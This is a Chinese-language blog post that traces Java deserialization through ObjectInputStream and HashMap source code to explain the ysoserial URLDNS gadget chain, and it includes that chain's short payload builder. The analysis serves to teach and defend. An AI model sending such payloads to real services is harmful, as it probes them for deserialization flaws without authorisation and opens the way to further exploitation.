Java readObject 源碼解讀和反序列化分析

首先看 java.io.ObjectInputStream 的 readObject 函數:

/**
 * Reads the next object from the stream (excerpt of java.io.ObjectInputStream#readObject).
 *
 * If enableOverride is set, the call is delegated to readObjectOverride(). Otherwise the
 * object is read via readObject0(false), any ClassNotFoundException recorded for the
 * object's handle is rethrown, and once the outermost call has finished (depth == 0)
 * the callbacks queued in vlist are run.
 *
 * @return the deserialized object
 * @throws IOException on stream errors
 * @throws ClassNotFoundException if a class of the object being read could not be resolved
 */
public final Object readObject()
        throws IOException, ClassNotFoundException
    {
        if (enableOverride) {
            return readObjectOverride();
        }

        // if nested read, passHandle contains handle of enclosing object
        int outerHandle = passHandle;
        try {
            Object obj = readObject0(false);
            // Link the handle of the object just read to the enclosing object's handle
            handles.markDependency(outerHandle, passHandle);
            ClassNotFoundException ex = handles.lookupException(passHandle);
            if (ex != null) {
                throw ex;
            }
            // Only the outermost readObject call runs the queued callbacks
            if (depth == 0) {
                vlist.doCallbacks();
            }
            return obj;
        } finally {
            // Restore the enclosing object's handle for the caller
            passHandle = outerHandle;
            if (closed && depth == 0) {
                clear();
            }
        }
    }

重點分析readObject0這個函數:

/**
 * Core dispatch routine behind readObject() (excerpt of ObjectInputStream#readObject0).
 *
 * Temporarily turns block-data mode off, consumes any TC_RESET markers, then peeks at
 * the next type-code byte and dispatches to the matching reader (readNull, readHandle,
 * readClass, readClassDesc, readString, readArray, readEnum, readOrdinaryObject).
 * Unexpected block data or end-of-block markers raise OptionalDataException when the
 * caller was in block-data mode, or StreamCorruptedException otherwise. The original
 * block-data mode and the nesting depth are restored in the finally clause.
 *
 * @param unshared whether the object should be read as unshared (passed to the readers)
 * @return the object read from the stream
 * @throws IOException on stream errors or an invalid type code
 */
private Object readObject0(boolean unshared) throws IOException {
    boolean oldMode = bin.getBlockDataMode();
    if (oldMode) {
        int remain = bin.currentBlockRemaining();
        if (remain > 0) {
            throw new OptionalDataException(remain);
        } else if (defaultDataEnd) {
            /*
                 * Fix for 4360508: stream is currently at the end of a field
                 * value block written via default serialization; since there
                 * is no terminating TC_ENDBLOCKDATA tag, simulate
                 * end-of-custom-data behavior explicitly.
                 */
            throw new OptionalDataException(true);
        }
        // Turn block-data mode off here
        bin.setBlockDataMode(false);
    }

    byte tc;
    // Peek at the first byte (the type code) of the next item in the serialized data,
    // consuming and handling any TC_RESET markers first
    while ((tc = bin.peekByte()) == TC_RESET) {
        bin.readByte();
        handleReset();
    }

    depth++;
    totalObjectRefs++;
    // When an ordinary object is being deserialized, tc is 115 (0x73),
    // so the TC_OBJECT case below is taken
    try {
        switch (tc) {
            case TC_NULL:
                return readNull();

            case TC_REFERENCE:
                return readHandle(unshared);

            case TC_CLASS:
                return readClass(unshared);

            case TC_CLASSDESC:
            case TC_PROXYCLASSDESC:
                return readClassDesc(unshared);

            case TC_STRING:
            case TC_LONGSTRING:
                return checkResolve(readString(unshared));

            case TC_ARRAY:
                return checkResolve(readArray(unshared));

            case TC_ENUM:
                return checkResolve(readEnum(unshared));

            case TC_OBJECT:
                return checkResolve(readOrdinaryObject(unshared));

            case TC_EXCEPTION:
                IOException ex = readFatalException();
                throw new WriteAbortedException("writing aborted", ex);

            case TC_BLOCKDATA:
            case TC_BLOCKDATALONG:
                if (oldMode) {
                    bin.setBlockDataMode(true);
                    bin.peek();             // force header read
                    throw new OptionalDataException(
                        bin.currentBlockRemaining());
                } else {
                    throw new StreamCorruptedException(
                        "unexpected block data");
                }

            case TC_ENDBLOCKDATA:
                if (oldMode) {
                    throw new OptionalDataException(true);
                } else {
                    throw new StreamCorruptedException(
                        "unexpected end of block data");
                }

            default:
                throw new StreamCorruptedException(
                    String.format("invalid type code: %02X", tc));
        }
    } finally {
        depth--;
        bin.setBlockDataMode(oldMode);
    }
}

再進入readOrdinaryObject:

/**
 * Reads an ordinary (TC_OBJECT) object (excerpt of ObjectInputStream#readOrdinaryObject).
 *
 * Steps:
 * 1. Read the class descriptor.
 * 2. Reject String, Class and ObjectStreamClass descriptors.
 * 3. Instantiate the class if it is instantiable; otherwise obj stays null.
 * 4. Assign a handle to the object.
 * 5. Fill in the object's state via readExternalData for Externalizable classes,
 *    or readSerialData otherwise.
 * 6. If obj is non-null, no ClassNotFoundException was recorded and the class has a
 *    readResolve method, replace obj with the readResolve result. The replacement is
 *    first passed through filterCheck.
 *
 * @param unshared whether the object is being read as unshared
 * @return the deserialized object, or its readResolve replacement
 * @throws IOException on stream errors or if the instance cannot be created
 */
private Object readOrdinaryObject(boolean unshared)
    throws IOException
{
    if (bin.readByte() != TC_OBJECT) {
        throw new InternalError();
    }
    // Example values observed while debugging the User class:
    // name = com.xxx.xxx.xxx.User
    // suid = 1
    // fields = the field names and types declared in User
    ObjectStreamClass desc = readClassDesc(false);
    desc.checkDeserialize();

    Class<?> cl = desc.forClass();
    if (cl == String.class || cl == Class.class
            || cl == ObjectStreamClass.class) {
        throw new InvalidClassException("invalid class descriptor");
    }

    Object obj;
    try {
        obj = desc.isInstantiable() ? desc.newInstance() : null;
    } catch (Exception ex) {
        throw (IOException) new InvalidClassException(
            desc.forClass().getName(),
            "unable to create instance").initCause(ex);
    }

    passHandle = handles.assign(unshared ? unsharedMarker : obj);
    ClassNotFoundException resolveEx = desc.getResolveException();
    if (resolveEx != null) {
        handles.markException(passHandle, resolveEx);
    }

    if (desc.isExternalizable()) {
        readExternalData((Externalizable) obj, desc);
    } else {
        // Non-Externalizable classes take this branch to deserialize obj's state
        readSerialData(obj, desc);
    }

    handles.finish(passHandle);

    if (obj != null &&
        handles.lookupException(passHandle) == null &&
        desc.hasReadResolveMethod())
    {
        Object rep = desc.invokeReadResolve(obj);
        if (unshared && rep.getClass().isArray()) {
            rep = cloneArray(rep);
        }
        if (rep != obj) {
            // Filter the replacement object
            if (rep != null) {
                if (rep.getClass().isArray()) {
                    filterCheck(rep.getClass(), Array.getLength(rep));
                } else {
                    filterCheck(rep.getClass(), -1);
                }
            }
            handles.setObject(passHandle, obj = rep);
        }
    }

    return obj;
}

再進入到readSerialData這個函數裏面:

/**
 * Reads the serialized field data of obj one class slot at a time
 * (excerpt of ObjectInputStream#readSerialData; "..." marks code omitted in this article).
 *
 * For each slot that has data:
 * - If obj is non-null, the slot's class defines a readObject method and no
 *   ClassNotFoundException was recorded, that readObject is invoked.
 * - Otherwise defaultReadFields is used.
 *
 * For slots without data, readObjectNoData is invoked when the class defines it.
 *
 * @param obj  the object being populated (null when the class was not instantiable)
 * @param desc class descriptor of obj
 * @throws IOException on stream errors
 */
private void readSerialData(Object obj, ObjectStreamClass desc)
    throws IOException
{
    // Slots are processed starting from the superclass
    ObjectStreamClass.ClassDataSlot[] slots = desc.getClassDataLayout();
    for (int i = 0; i < slots.length; i++) {
        ObjectStreamClass slotDesc = slots[i].desc;

        if (slots[i].hasData) {
            if (obj != null &&
                slotDesc.hasReadObjectMethod() &&
                handles.lookupException(passHandle) == null)
            {
                ...
                    // The class defines its own readObject(): invoke it
                    slotDesc.invokeReadObject(obj, this);
                ...
            } else {
                // Otherwise fall back to default field deserialization, mirroring default serialization
                defaultReadFields(obj, slotDesc);
            }
            // Skip any remaining custom (writeObject) data for this slot, if present
            if (slotDesc.hasWriteObjectData()) {
                skipCustomData();
            } else {
                bin.setBlockDataMode(false);
            }
        } else {
            if (obj != null &&
                slotDesc.hasReadObjectNoDataMethod() &&
                handles.lookupException(passHandle) == null)
            {
                slotDesc.invokeReadObjectNoData(obj);
            }
        }
    }
}

在readSerialData中比較關鍵的是

// Condition deciding whether a class's own readObject() is invoked during deserialization:
if (obj != null &&
                slotDesc.hasReadObjectMethod() &&
                handles.lookupException(passHandle) == null)

這個 if 判斷。其中 slotDesc.hasReadObjectMethod() 檢查的是 readObjectMethod 這個屬性是否爲空:如果被反序列化的類沒有自定義(私有的)readObject() 方法,readObjectMethod 就是 null;如果這個類自定義了 readObject(),那麼就會進入到 if 之中的

// Invokes the readObject method defined by the class being deserialized
slotDesc.invokeReadObject(obj, this);

所有的關鍵都在 invokeReadObject 裏面,這個函數會通過反射調用被反序列化的類中自定義的 readObject 方法。
在說invokeReadObject之前,先看看能夠觸發這個if語句的User類,以及執行User中的readobject方法:
在這裏插入圖片描述

因此,只要尋找自定義了 readObject 方法的可序列化類就好了。ysoserial 已經幫我們找到了一系列利用鏈,下面分析其中最簡單的利用鏈 URLDNS:

/**
 * Builds the URLDNS payload (ysoserial): a HashMap whose key is a java.net.URL.
 *
 * ht.put(u, url) hashes the key, which caches a value in the URL's private hashCode
 * field. Resetting that field to -1 afterwards prevents the cached value from being
 * reused, so URL.hashCode() recomputes it through the handler when the map is
 * deserialized. The SilentURLStreamHandler is presumably used to avoid a real DNS
 * lookup while the payload is being built (its source is not shown here).
 *
 * @param url url[0] is the URL whose host will be resolved on the target
 * @return the HashMap to serialize
 */
public Object getObject(String... url) throws Exception {
        URLStreamHandler handler = new URLDNS.SilentURLStreamHandler();
        HashMap ht = new HashMap();
        URL u = new URL((URL)null, url[0], handler);
        ht.put(u, url);
        // Must run after put(): put() has already cached a hash code in u
        Reflections.setFieldValue(u, "hashCode", -1);
        return ht;
    }

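首先看到這個利用鏈使用的是 HashMap,返回的也是 HashMap 對象 ht。查看 HashMap 類,查找 readObject 這個函數,赫然發現它自定義了 readObject。下面是 JDK 7 中的源碼;JDK 8 及以後的版本改爲調用 putVal(hash(key), key, value, false, false),同樣會對每個 key 調用 hashCode():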
在這裏插入圖片描述

/**
 * Reconstitutes a HashMap from a stream (excerpt of HashMap#readObject; this version,
 * with putForCreate and useAltHashing, appears to be JDK 7 source — TODO confirm).
 *
 * After validating loadFactor and the mapping count, it sizes the table to the
 * smallest power of two that holds all mappings. It then reads each key/value pair
 * with s.readObject() and inserts it via putForCreate, which hashes the key.
 *
 * @param s the stream to read from
 * @throws IOException on stream errors or an illegal load factor / mapping count
 * @throws ClassNotFoundException if a key or value class cannot be resolved
 */
private void readObject(java.io.ObjectInputStream s)
         throws IOException, ClassNotFoundException
    {
        // Read in the threshold (ignored), loadfactor, and any hidden stuff
        s.defaultReadObject();
        if (loadFactor <= 0 || Float.isNaN(loadFactor))
            throw new InvalidObjectException("Illegal load factor: " +
                                               loadFactor);

        // set hashSeed (can only happen after VM boot)
        Holder.UNSAFE.putIntVolatile(this, Holder.HASHSEED_OFFSET,
                sun.misc.Hashing.randomHashSeed(this));

        // Read in number of buckets and allocate the bucket array;
        s.readInt(); // ignored

        // Read number of mappings
        int mappings = s.readInt();
        if (mappings < 0)
            throw new InvalidObjectException("Illegal mappings count: " +
                                               mappings);

        int initialCapacity = (int) Math.min(
                // capacity chosen by number of mappings
                // and desired load (if >= 0.25)
                mappings * Math.min(1 / loadFactor, 4.0f),
                // we have limits...
                HashMap.MAXIMUM_CAPACITY);
        int capacity = 1;
        // find smallest power of two which holds all mappings
        while (capacity < initialCapacity) {
            capacity <<= 1;
        }

        table = new Entry[capacity];
        threshold = (int) Math.min(capacity * loadFactor, MAXIMUM_CAPACITY + 1);
        useAltHashing = sun.misc.VM.isBooted() &&
                (capacity >= Holder.ALTERNATIVE_HASHING_THRESHOLD);

        init();  // Give subclass a chance to do its thing.

        // Read the keys and values, and put the mappings in the HashMap
        // putForCreate() calls hash(key) for every non-null deserialized key
        for (int i=0; i<mappings; i++) {
            K key = (K) s.readObject();
            V value = (V) s.readObject();
            putForCreate(key, value);
        }
    }

看到最後面那個for循環:

// Each deserialized key/value pair is passed to putForCreate(), which hashes the key:
for (int i=0; i<mappings; i++) {
            K key = (K) s.readObject();
            V value = (V) s.readObject();
            putForCreate(key, value);
        }

可以看到它對每一個key和value都執行了readobject,之後把key和value放入putForCreate這個函數中

/**
 * Inserts a mapping while building a map from clone/deserialization
 * (excerpt of HashMap#putForCreate).
 *
 * The bucket index is derived from hash(key), or 0 for a null key. If an equal key
 * already exists in that bucket, its value is replaced; otherwise a new entry is
 * created with createEntry.
 *
 * @param key   the key (may be null)
 * @param value the value
 */
private void putForCreate(K key, V value) {
        // For a non-null key this calls hash(key), i.e. key.hashCode()
        int hash = null == key ? 0 : hash(key);
        int i = indexFor(hash, table.length);

        /**
         * Look for preexisting entry for key.  This will never happen for
         * clone or deserialize.  It will only happen for construction if the
         * input Map is a sorted map whose ordering is inconsistent w/ equals.
         */
        for (Entry<K,V> e = table[i]; e != null; e = e.next) {
            Object k;
            if (e.hash == hash &&
                ((k = e.key) == key || (key != null && key.equals(k)))) {
                e.value = value;
                return;
            }
        }

        createEntry(hash, key, value, i);
    }

在 putForCreate 第一行(key 不爲 null 時)調用了 hash(key) 這個函數,進入這個函數:

/**
 * Computes the spread hash for a key (excerpt of HashMap#hash).
 *
 * With alternative hashing enabled, String keys are hashed with stringHash32 and other
 * keys start from hashSeed. In all non-String cases the result is derived from
 * k.hashCode(), which is the call the URLDNS chain relies on.
 *
 * @param k the key; non-null here, since putForCreate handles null keys itself
 * @return the bit-spread hash value
 */
final int hash(Object k) {
        int h = 0;
        if (useAltHashing) {
            if (k instanceof String) {
                return sun.misc.Hashing.stringHash32((String) k);
            }
            h = hashSeed;
        }

        // Calls the key's own hashCode(); for a java.net.URL key this is URL.hashCode()
        h ^= k.hashCode();

        // This function ensures that hashCodes that differ only by
        // constant multiples at each bit position have a bounded
        // number of collisions (approximately 8 at default load factor).
        h ^= (h >>> 20) ^ (h >>> 12);
        return h ^ (h >>> 7) ^ (h >>> 4);
    }

走到這一步就要好好看看java的調用鏈,如下圖:
在這裏插入圖片描述

看到 hash 函數中的 h ^= k.hashCode(); 這一行,這裏的 k 調用了 hashCode 這個函數。也就是說,反序列化 HashMap 時會對每一個 key 調用其 hashCode() 方法。

再看URLDNS這個利用鏈中後面加入的如下代碼

URL u = new URL(null, url, handler); // the URL object is used as the map key
ht.put(u, url); // put the URL object and the url string into the HashMap, giving {u: url}
Reflections.setFieldValue(u, "hashCode", -1); // reset the hash code cached by put() so it is recomputed on deserialization

URLDNS 中使用的這個 key 是一個 java.net.URL 對象,去查看 java.net.URL 的 hashCode 函數:

/**
 * Returns this URL's hash code (excerpt of java.net.URL#hashCode).
 *
 * Any value other than -1 in the private hashCode field is treated as a cached result
 * and returned directly. Otherwise the hash is computed by handler.hashCode(this)
 * and stored in that field.
 *
 * @return the hash code of this URL
 */
public synchronized int hashCode() {
        // -1 means "not computed yet"; anything else is the cached value
        if (hashCode != -1)
            return hashCode;

        hashCode = handler.hashCode(this);
        return hashCode;
    }

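此時,handler 是 URLStreamHandler 對象(的某個子類對象),繼續跟進其 hashCode 方法。在調用 handler.hashCode 之前有一個判斷 if (hashCode != -1):只要 hashCode 這個私有變量不爲 -1,就直接返回緩存的值,不會進入 handler.hashCode。生成 payload 時,ht.put(u, url) 已經計算過一次 hashCode 並緩存到了這個變量裏(而 hashCode 字段會被一起序列化),所以必須把它重新設置爲 -1。URLDNS 利用鏈正是在 put 之後使用 Reflections.setFieldValue(u, "hashCode", -1); 把這個私有屬性設置爲 -1,這樣反序列化時 HashMap 對 key 調用 hashCode,就會進入到 handler.hashCode(this) 這一步。另外,URL 的 handler 字段是 transient 的,不會被序列化,反序列化時會根據協議重新獲取默認的 URLStreamHandler,因此生成 payload 時使用的 SilentURLStreamHandler 不會影響目標端。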
在這裏插入圖片描述
(上圖爲設置hashCode這個私有變量之後的值)

/**
 * Computes a hash code for u (excerpt of java.net.URLStreamHandler#hashCode(URL)).
 *
 * Sums the hashes of:
 * - the protocol;
 * - the host: the InetAddress returned by getHostAddress(u) when non-null,
 *   otherwise the lower-cased host name;
 * - the file;
 * - the port (getDefaultPort() when the port is -1);
 * - the ref.
 *
 * Because getHostAddress may resolve the host name, hashing a URL can trigger a
 * DNS lookup.
 *
 * @param u the URL to hash
 * @return the hash code
 */
protected int hashCode(URL u) {
        int h = 0;

        // Generate the protocol part.
        String protocol = u.getProtocol();
        if (protocol != null)
            h += protocol.hashCode();

        // Generate the host part.
        // getHostAddress may perform name resolution (InetAddress.getByName)
        InetAddress addr = getHostAddress(u);
        if (addr != null) {
            h += addr.hashCode();
        } else {
            String host = u.getHost();
            if (host != null)
                h += host.toLowerCase().hashCode();
        }

        // Generate the file part.
        String file = u.getFile();
        if (file != null)
            h += file.hashCode();

        // Generate the port part.
        if (u.getPort() == -1)
            h += getDefaultPort();
        else
            h += u.getPort();

        // Generate the ref part.
        String ref = u.getRef();
        if (ref != null)
            h += ref.hashCode();

        return h;
    }

這裏調用了 getHostAddress 方法,繼續跟進:

/**
 * Returns the IP address of u's host, resolving it on first use
 * (excerpt of java.net.URLStreamHandler#getHostAddress).
 *
 * A previously resolved u.hostAddress is returned directly, and a null or empty host
 * yields null. Otherwise InetAddress.getByName(host) is called and the result is
 * cached in u.hostAddress; for a host name this means a DNS query. Both
 * UnknownHostException and SecurityException yield null.
 *
 * @param u the URL whose host should be resolved
 * @return the host's address, or null if it cannot be determined
 */
protected synchronized InetAddress getHostAddress(URL u) {
        if (u.hostAddress != null)
            return u.hostAddress;

        String host = u.getHost();
        if (host == null || host.equals("")) {
            return null;
        } else {
            try {
                // Name resolution happens here; this is the DNS request URLDNS observes
                u.hostAddress = InetAddress.getByName(host);
            } catch (UnknownHostException ex) {
                return null;
            } catch (SecurityException se) {
                return null;
            }
        }
        return u.hostAddress;
    }

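這裏 InetAddress.getByName(host) 的作用是根據主機名獲取其 IP 地址,在網絡上其實就是一次 DNS 查詢,到這裏就不必再跟下去了。整條調用鏈是:HashMap.readObject → putForCreate → hash → URL.hashCode → URLStreamHandler.hashCode → getHostAddress → InetAddress.getByName。最終目標端會向 payload 中指定的域名發起一次 DNS 查詢,這就是 URLDNS 利用鏈。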

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章